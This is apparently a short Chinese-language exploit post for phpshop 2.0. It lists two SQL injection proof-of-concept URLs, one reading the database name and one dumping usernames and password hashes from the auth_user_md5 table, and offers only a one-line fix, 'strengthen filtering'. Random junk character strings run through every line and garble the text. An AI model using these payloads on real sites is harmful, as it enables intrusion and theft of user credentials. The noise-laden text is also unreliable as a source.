标题 : phpshop 2.0 SQL Injection Vulnerability
! Z! h- [8 |9 g l$ s* I: | `+ }/ l. q+ H
作者 : By onestree
- d3 V" f4 ~: c下载地址 : http://code.google.com/p/phpshop/downloads/list! \1 \/ L% J5 ~1 p
测试地址: windows 7 / ubuntu; n9 a* y0 L4 Q7 E( A' I7 F
" {% g! @/ ~. q5 r: t2 ?/ y% q' Y
* \# W5 v1 w6 A( Y. b1 PSQLi p0c:
- W- ]8 l/ [2 t
' {( ^( |) D% R" t7 k==================- i V4 {* i6 f0 M! d9 g$ V8 r
& _& b' g* p! C( K+ b4 |
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
' [3 f5 C, q4 v: e4 b- V- o) [union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --& T/ I$ x5 z, h6 `, z* p6 G c
4 m& B$ j/ @5 ~http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
3 P6 r3 W! C* W" E' u. T& |. O+ N# V* ]' S; t* t# q$ ~% K6 `0 @
修复:/ w6 m5 T. B0 Y
加强过滤5 c) C/ u" ~7 F$ |3 i) j: j+ Q5 k
; A6 V' W/ N" p- t6 c+ x
0 E; {' W. W7 `& L2 f |